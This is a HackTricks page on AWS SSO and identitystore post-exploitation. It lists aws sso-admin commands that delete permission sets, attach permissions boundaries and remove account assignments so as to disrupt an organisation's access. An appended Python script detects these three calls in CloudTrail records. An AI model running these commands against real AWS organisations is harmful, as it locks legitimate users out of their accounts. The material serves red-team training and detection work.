hacktricks-cloud/pentesting-cloud/aws-security/aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.md
2024-12-12 19:35:48 +01:00


# AWS - SSO & identitystore Post Exploitation

{% hint style="success" %} Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}

## SSO & identitystore

For more information check:

{% content-ref url="../aws-services/aws-iam-enum.md" %} aws-iam-enum.md {% endcontent-ref %}

### sso:DeletePermissionSet | sso:PutPermissionsBoundaryToPermissionSet | sso:DeleteAccountAssignment

These permissions can be used to disrupt access in the organization: deleting a permission set, attaching a permissions boundary to a permission set, or removing an account assignment:

{% code overflow="wrap" %}

```bash
# Delete a permission set (all assignments that used it stop granting access)
aws sso-admin delete-permission-set --instance-arn <SSOInstanceARN> --permission-set-arn <PermissionSetARN>

# Attach a permissions boundary to a permission set, capping what it can grant
aws sso-admin put-permissions-boundary-to-permission-set --instance-arn <SSOInstanceARN> --permission-set-arn <PermissionSetARN> --permissions-boundary-policy-arn <PolicyARN>

# Remove the assignment of a permission set to a user/group on a target account
aws sso-admin delete-account-assignment --instance-arn <SSOInstanceARN> --target-id <TargetID> --target-type <TargetType> --permission-set-arn <PermissionSetARN> --principal-type <PrincipalType> --principal-id <PrincipalID>
```

{% endcode %}
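From the defender's side, all three of the calls above land in CloudTrail as `sso-admin` API events, so they are easy to alert on. The following is an added example (not part of the HackTricks page) that scans CloudTrail-style records for exactly these three `eventName` values and reports who made the call, from where, and which permission set or target was affected. The sample records are constructed; the `eventSource` value `sso.amazonaws.com` and the camelCase `requestParameters` key names are assumptions that should be checked against a real trail before the rule is deployed.

```python
"""Flag IAM Identity Center (SSO) permission-disrupting API calls in CloudTrail records.

Added example, not from the HackTricks page. The record shapes below are
constructed; eventSource and requestParameters key names are assumptions
to verify against your own CloudTrail output.
"""
import json
from typing import Iterable

# The three sso-admin actions the page lists, mapped to a short description.
DISRUPTIVE_SSO_EVENTS = {
    "DeletePermissionSet": "permission set deleted",
    "PutPermissionsBoundaryToPermissionSet": "permissions boundary attached to permission set",
    "DeleteAccountAssignment": "account assignment removed",
}

# Assumed eventSource for IAM Identity Center admin API calls.
SSO_EVENT_SOURCE = "sso.amazonaws.com"

# Constructed CloudTrail-like records: one benign read, the three disruptive
# calls from the page, and one unrelated IAM event that must be ignored.
SAMPLE_TRAIL = [
    {"eventTime": "2024-12-12T18:00:00Z", "eventSource": SSO_EVENT_SOURCE,
     "eventName": "ListPermissionSets", "sourceIPAddress": "203.0.113.10",
     "userIdentity": {"arn": "arn:aws:iam::111111111111:user/auditor"},
     "requestParameters": {"instanceArn": "arn:aws:sso:::instance/ssoins-EXAMPLE"}},
    {"eventTime": "2024-12-12T18:05:00Z", "eventSource": SSO_EVENT_SOURCE,
     "eventName": "DeletePermissionSet", "sourceIPAddress": "198.51.100.7",
     "userIdentity": {"arn": "arn:aws:iam::111111111111:user/compromised-admin"},
     "requestParameters": {"instanceArn": "arn:aws:sso:::instance/ssoins-EXAMPLE",
                           "permissionSetArn": "arn:aws:sso:::permissionSet/ssoins-EXAMPLE/ps-EXAMPLE1"}},
    {"eventTime": "2024-12-12T18:06:00Z", "eventSource": SSO_EVENT_SOURCE,
     "eventName": "PutPermissionsBoundaryToPermissionSet", "sourceIPAddress": "198.51.100.7",
     "userIdentity": {"arn": "arn:aws:iam::111111111111:user/compromised-admin"},
     "requestParameters": {"instanceArn": "arn:aws:sso:::instance/ssoins-EXAMPLE",
                           "permissionSetArn": "arn:aws:sso:::permissionSet/ssoins-EXAMPLE/ps-EXAMPLE2"}},
    {"eventTime": "2024-12-12T18:07:00Z", "eventSource": SSO_EVENT_SOURCE,
     "eventName": "DeleteAccountAssignment", "sourceIPAddress": "198.51.100.7",
     "userIdentity": {"arn": "arn:aws:iam::111111111111:user/compromised-admin"},
     "requestParameters": {"instanceArn": "arn:aws:sso:::instance/ssoins-EXAMPLE",
                           "targetId": "222222222222", "targetType": "AWS_ACCOUNT",
                           "principalType": "GROUP", "principalId": "GROUP-ID-EXAMPLE",
                           "permissionSetArn": "arn:aws:sso:::permissionSet/ssoins-EXAMPLE/ps-EXAMPLE2"}},
    {"eventTime": "2024-12-12T18:08:00Z", "eventSource": "iam.amazonaws.com",
     "eventName": "DeletePolicy", "sourceIPAddress": "198.51.100.7",
     "userIdentity": {"arn": "arn:aws:iam::111111111111:user/compromised-admin"},
     "requestParameters": {"policyArn": "arn:aws:iam::111111111111:policy/Example"}},
]


def flag_sso_disruption(records: Iterable[dict]) -> list[dict]:
    """Return one finding per record that is one of the three disruptive sso-admin calls."""
    findings = []
    for rec in records:
        if rec.get("eventSource") != SSO_EVENT_SOURCE:
            continue  # not an IAM Identity Center admin call
        name = rec.get("eventName")
        if name not in DISRUPTIVE_SSO_EVENTS:
            continue  # reads and other SSO calls are not interesting here
        params = rec.get("requestParameters") or {}
        identity = rec.get("userIdentity") or {}
        findings.append({
            "time": rec.get("eventTime"),
            "action": name,
            "description": DISRUPTIVE_SSO_EVENTS[name],
            "actor": identity.get("arn"),
            "source_ip": rec.get("sourceIPAddress"),
            "permission_set": params.get("permissionSetArn"),
            "target": params.get("targetId"),  # only present on DeleteAccountAssignment
        })
    return findings


def scan_cloudtrail_file(text: str) -> list[dict]:
    """Accept the standard CloudTrail file layout {"Records": [...]} or a bare list."""
    data = json.loads(text)
    records = data["Records"] if isinstance(data, dict) else data
    return flag_sso_disruption(records)


if __name__ == "__main__":
    for f in flag_sso_disruption(SAMPLE_TRAIL):
        print(f"{f['time']} {f['actor']} from {f['source_ip']}: {f['description']} "
              f"(permission set {f['permission_set']}, target {f['target']})")
```

In a real deployment the same three `eventName` values can go straight into an EventBridge rule or a SIEM query; the point of the script is to show that a single principal issuing these calls in quick succession, as in the constructed sample, is the signature to look for.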
